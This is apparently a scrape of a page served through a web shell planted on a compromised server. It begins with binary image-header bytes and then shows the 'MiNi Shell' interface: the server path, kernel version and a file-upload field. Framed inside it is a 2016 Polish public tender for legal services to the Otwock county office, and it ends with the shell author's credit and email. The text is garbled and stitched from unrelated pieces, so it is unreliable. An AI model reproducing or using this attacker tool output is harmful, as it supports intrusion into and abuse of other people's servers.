JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20160413/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20160413/87084-N-2016.html

<p class="kh_header"><b>Otwock: ŚWIADCZENIE USŁUG PRAWNYCH NA RZECZ  STAROSTWA POWIATOWEGO 
W OTWOCKU ORAZ POWIATOWYCH JEDNOSTEK ORGANIZACYJNYCH</b><br>
<b>Numer ogłoszenia: 87084 - 2016; data zamieszczenia: 13.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Otwocki , ul. Górna 13, 05-400 Otwock, woj. mazowieckie, tel. 22 778-1-300, faks 22 778-1-302.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-otwocki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ŚWIADCZENIE USŁUG PRAWNYCH NA RZECZ  STAROSTWA POWIATOWEGO 
W OTWOCKU ORAZ POWIATOWYCH JEDNOSTEK ORGANIZACYJNYCH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest świadczenie usług prawnych na rzecz Starostwa Powiatowego w Otwocku oraz wskazanych powiatowych jednostek organizacyjnych (Powiatowe Centrum Pomocy Rodzinie w Otwocku wraz z obsługiwanymi jednostkami, Oświata Powiatowa w Otwocku  wraz z obsługiwanymi jednostkami, Zarząd Dróg Powiatowych w Karczewie, Publiczna Biblioteka Powiatowa w Otwocku). 

2.	Zakres zamówienia polega w szczególności na:
1)	stałym  doradztwie prawnym  w zakresie rozwiązywania  problemów prawnych  związanych z bieżącą  działalnością  wydziałów Starostwa  Powiatowego w Otwocku,
2)	udzielaniu porad prawnych, konsultacji prawnych i udzielanie opinii prawnych w zakresie stosowania prawa w odniesieniu do wykonywanych przez powiat zadań w terminie  5 dni roboczych od dnia ich  złożenia wniosku  o jej  wydanie,
3)	współudziale przy opracowywaniu statutów, regulaminów, zarządzeń i innych dokumentów regulujących funkcjonowanie organów powiatu, Starostwa Powiatowego oraz jednostek organizacyjnych powiatu,
4)	udziale w opracowywaniu projektów przepisów prawa miejscowego,
5)	udziale w opracowywaniu i uzgadnianiu oraz opiniowanie pod względem formalno- prawnym i parafowanie aktów prawa wydawanych przez Zarząd Powiatu oraz projektów uchwał Rady Powiatu i innych aktów prawnych związanych z zakresem działalności Zamawiającego,
6)	udziale w sesjach Rady Powiatu, w razie potrzeby zgłoszonej przez Zamawiającego w posiedzeniach Zarządu Powiatu i Komisjach Rady Powiatu,
7)	udziale w razie potrzeby zgłoszonej przez Zamawiającego w przetargach, rozprawach administracyjnych oraz innych spotkaniach,
8)	opiniowaniu projektów umów, porozumień, uzgodnień, pism i innych dokumentów oraz uczestnictwie w negocjacjach nad ich tworzeniem,
9)	opiniowaniu korespondencji Zamawiającego z organami administracji publicznej  i innymi instytucjami oraz osobami prawnymi i fizycznymi,
10)	opiniowaniu projektów udzielanych pełnomocnictw i upoważnień,
11)	opiniowaniu dokumentacji przygotowanej w oparciu o przepisy ustawy - Prawo zamówień publicznych
12)	udziale w negocjacjach warunków umów i porozumień zawieranych przez Powiat Otwocki i Starostę reprezentującego Skarb Państwa, opiniowanie projektów tych umów i porozumień,
13)	współdziałaniu w zakresie regulacji stanów prawnych nieruchomości Powiatu i Skarbu Państwa, 
14)	pomocy przy opracowywaniu decyzji administracyjnych w indywidualnych sprawach obywateli,
15)	reprezentowaniu Zleceniodawcy w mediach, w sytuacjach, których Zleceniodawca uzna za wskazane,
16)	sporządzaniu opinii prawnych, ekspertyz, analiz i komunikatów prawnych,
17)	prowadzeniu konsultacji prawnych, w tym konsultacje i doradztwo w zakresie spraw wynikających z Kodeksu pracy i umów cywilno-prawnych dotyczących zatrudnienia pracowników,
18)	uczestnictwo w prowadzonych  przez Zamawiającego rokowaniach lub negocjacjach, których celem  jest nawiązanie, zmiana, rozwiązanie stosunku prawnego lub zawarcie ugody,
19)	wskazywaniu propozycji rozwiązywania problemów prawnych,
20)	współudziale w organizowaniu szkoleń wewnętrznych, szczególnie z zakresu nowych rozwiązań prawnych,
21)	informowaniu Zarządu Powiatu o zadaniach powiatu wynikających z nowych lub znowelizowanych przepisów prawnych, informowanie o zmianach w przepisach prawnych, udzielanie wyjaśnień i porad prawnych dotyczących interpretacji i stosowania przepisów prawnych,
22)	udział w imieniu Zamawiającego , w ramach uzyskanych pełnomocnictw, w spotkaniach i naradach  z organami administracji publicznej oraz podmiotami gospodarczymi,
23)	zastępstwo prawne i procesowe we wszystkich sprawach z związanych z działalnością Powiatu  Otwockiego oraz Skarbu Państwa - Starosty Otwockiego, 
24)	zastępstwo procesowego przed urzędami i organami orzekającymi, a przede wszystkim sądami powszechnymi, administracyjnymi i egzekucyjnymi, ogólnymi i szczególnymi organami administracji państwowej, samorządowej oraz sądami polubownymi, w tym  przed  Samorządowym Kolegium Odwoławczym (SKO), Urzędem Skarbowym, RIO, NIK przed Krajową Izbą Odwoławczą, w sprawach związanych z działalnością powiatu oraz Skarbu Państwa - Starosty Otwockiego,
25)	opracowanie projektów pism sądowych, projektów  pism do organów ścigania oraz innych instytucji  w związku z prowadzonymi postępowaniami administracyjnymi, egzekucyjnymi, cywilnymi i karnymi,
26)	prowadzeniu rejestru spraw sądowych i egzekucyjnych prowadzonych na zlecenie Zamawiającego i udostępnianie na każde żądanie Zamawiającego ,
27)	doradztwo oraz prowadzenie spraw dotyczących funkcji ( w tym  opiniowanie i parafowanie  uchwał zgromadzenia wspólników) zgromadzenia wspólników Powiatowego Centrum Zdrowia w Otwocku,
28)	Wykonywaniu innych czynności według potrzeb Zamawiającego związanych ze świadczeniem usług prawnych..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje możliwość udzielenia zamówienia uzupełniającego dotychczasowemu  wykonawcy  na podstawie odrębnej umowy w trybie zamówienia z wolnej ręki, na podstawie art. 67 ust. 1 pkt. 6 ustawy PZP do 30% wartości zamówienia podstawowego okresie 3 lat  od udzielenia zamówienia podstawowego w zakresie świadczenia usług prawnych na rzecz Starostwa Powiatowego w Otwocku oraz jednostek organizacyjnych oraz zastępstwa procesowego. Miesięczne wynagrodzenie   za wykonywaną  usługę nie może być wyższe niż wynagrodzenie miesięczne wskazane w zawartej umowie.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.10.00.00-5, 79.11.00.00-8, 79.11.10.00-5, 79.14.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje szczegółowego opisu sposobu dokonywania oceny spełnienia tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że w/w warunek zostanie spełniony jeżeli wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał lub wykonuje należycie: co najmniej 1 usługę polegającą na obsłudze prawnej jednostki samorządu terytorialnego, o liczbie mieszkańców nie mniejszej niż 100 tys. mieszkańców, która to usługa trwała lub trwa nieprzerwanie co najmniej 24 miesiące w ramach której wchodziło
a)	zastępstwo procesowe w co najmniej 4 postępowaniach  o wznowienie postępowania w sprawie nabycia nieruchomości na podstawie dekretu z dnia 8 marca 1946 roku  o majątkach opuszczonych i poniemieckich  zakończonych prawomocnie korzystnie dla reprezentowanej strony ( tj.  oddaleniem lub odrzuceniem skargi o wznowienie postępowania w takiej sprawie.)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje szczegółowego opisu sposobu dokonywania oceny spełnienia tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że dysponuje co najmniej zespołem minimum 3 osób, które będą uczestniczyć w wykonywaniu zamówienia, z których każda legitymuje się kwalifikacjami zawodowymi w postaci uprawnień radcy prawnego lub adwokata, zgodnie z przepisami ustawy z dnia 6 lipca 1982 r. o radcach prawnych (Dz.U. z 2010 r. Nr 10, poz. 65 z późn. zm.) oraz ustawy z dnia 26 maja 1982 r. Prawo o adwokaturze (Dz.U.  2009 r. Nr 146 poz. 1188 z późn. zm.)  posiada co najmniej 2 letnie doświadczenie w świadczeniu obsługi prawnej  jednostki samorządu terytorialnego- powiatu lub  gminie, o  liczbie mieszkańców nie mniejszej niż 100.000  mieszkańców  oraz każda jest wpisana na listę radców prawnych  prowadzoną przez Okręgową Izbę Radców Prawnych lub listę adwokatów prowadzoną przez Okręgową Radę Adwokacką.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje szczegółowego opisu sposobu dokonywania oceny spełnienia tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Zamawiający uzna, że w/w warunek zostanie spełniony jeżeli wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał lub wykonuje należycie: co najmniej 1 usługę polegającą na obsłudze prawnej jednostki samorządu terytorialnego, o liczbie mieszkańców nie mniejszej niż 100 tys. mieszkańców, która to usługa trwała lub trwa nieprzerwanie co najmniej 24 miesiące w ramach której wchodziło
a)	zastępstwo procesowe w co najmniej 4 postępowaniach  o wznowienie postępowania w sprawie nabycia nieruchomości na podstawie dekretu z dnia 8 marca 1946 roku  o majątkach opuszczonych i poniemieckich  zakończonych prawomocnie korzystnie dla reprezentowanej strony ( tj.  oddaleniem lub odrzuceniem skargi o wznowienie postępowania w takiej sprawie.);</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - DOŚWIADCZENIE WYKONAWCY w stałej obsłudze prawnej powiatu - 10</li>
<li>3 - DOŚWIADCZENIE  osób   dot: obsługi  prawnej, w powiatach - 10</li>
<li>4 - doświad. osób.dot: zastęp. proceso. przed Komisją Regul.ds.Gmin Wyzn.Żyd - 10</li>
<li>5 - dośw.Wykan. dot: osób w obsludze postępowań sądowych-zast.proces. w Pow - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>6.	Zamawiający dopuszcza wprowadzenie zmian postanowień zawartej umowy w stosunku      do treści oferty, w następujących warunkach: 
1)  w razie zmiany obowiązujących przepisów prawa dotyczących postanowień umowy w zakresie wprowadzenia zmian wynikających z tych przepisów;
2) zmiany osób wchodzących w skład zespołu skierowanego do realizacji umowy. Zmiana składu zespołu wskazanego w ofercie może nastąpić tylko w uzasadnionym przypadku, za pisemną zgodą Zamawiającego, a osoba zastępująca dotychczasową osobę musi wykazać się przynajmniej takim samym doświadczeniem i kwalifikacjami jak osoba zastępowana;
7.Strony umowy przewidują dodatkowo możliwość zmiany wysokości wynagrodzenia wykonawcy w następujących warunkach:
a) w przypadku zmiany stawki podatku od towarów i usług,
b) w przypadku zmiany wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę (Dz.U. Nr 200, poz. 1679 z późn. zm.),
c) zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne - jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez wykonawcę,
jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez wykonawcę.
8.W sytuacji wystąpienia okoliczności wskazanych w ppkt 7a wykonawca składa pisemny wniosek o zmianę umowy o zamówienie publiczne w zakresie płatności wynikających z faktur wystawionych po wejściu w życie przepisów zmieniających stawkę podatku od towarów i usług. Wniosek powinien zawierać wyczerpujące uzasadnienie faktyczne i prawne oraz dokładne wyliczenie kwoty wynagrodzenia wykonawcy po zmianie umowy. Obowiązek wykazania wpływu zmian na koszty wykonania zamówienia należy do wykonawcy pod rygorem odmowy dokonania zmiany umowy przez zamawiającego.
9.W sytuacji wystąpienia okoliczności wskazanych w ppkt 7b wykonawca składa pisemny wniosek o zmianę umowy o zamówienie publiczne w zakresie płatności wynikających z faktur wystawionych po wejściu w życie przepisów zmieniających wysokość minimalnego wynagrodzenia za pracę. Wniosek powinien zawierać wyczerpujące uzasadnienie faktyczne i prawne oraz dokładne wyliczenie kwoty wynagrodzenia wykonawcy po zmianie umowy, w szczególności wykonawca będzie zobowiązany wykazać związek pomiędzy wnioskowaną kwotą podwyższenia wynagrodzenia umownego a wpływem zmiany minimalnego wynagrodzenia za pracę na kalkulację ceny ofertowej. Wniosek powinien obejmować jedynie te dodatkowe koszty realizacji zamówienia, które wykonawca obowiązkowo ponosi w związku z podwyższeniem wysokości płacy minimalnej. Nie będą akceptowane koszty wynikające z podwyższenia wynagrodzeń pracowników wykonawcy, które nie są konieczne w celu ich dostosowania do wysokości minimalnego wynagrodzenia za pracę.
10.W sytuacji wystąpienia okoliczności wskazanych w ppkt 7c   wykonawca składa pisemny wniosek o zmianę umowy o zamówienie publiczne w zakresie płatności wynikających z faktur wystawionych po zmianie zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenie społeczne lub zdrowotne. Wniosek powinien zawierać wyczerpujące uzasadnienie faktyczne i prawne oraz dokładne wyliczenie kwoty wynagrodzenia wykonawcy po zmianie umowy, w szczególności wykonawca będzie zobowiązany wykazać związek pomiędzy wnioskowaną kwotą podwyższenia wynagrodzenia umownego a wpływem zmiany zasad, o których mowa w ppkt 7c, na kalkulację ceny ofertowej. Wniosek powinien obejmować jedynie te dodatkowe koszty realizacji zamówienia, które wykonawca obowiązkowo ponosi w związku ze zmianą zasad, o których mowa w ppkt 7c.
11. Warunkiem akceptacji wniosków, o których mowa w pkt ust. 8-10, jest zabezpieczenie przez 
    Zamawiającego środków finansowych na zmianę wynagrodzenia.
12.Zamawiający po zaakceptowaniu wniosków, o których mowa w ust.8-10, wyznacza datę   podpisania aneksu do umowy.
13.Zmiana umowy skutkuje zmianą wynagrodzenia jedynie w zakresie płatności realizowanych po dacie zawarcia aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat-otwocki.pl/BIP<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Otwocku ul. Komunardów 10 wejście D pok. 30.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.04.2016 godzina 11:00, miejsce: Starostwo Powiatowe w Otwocku ul. Górna 13  kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com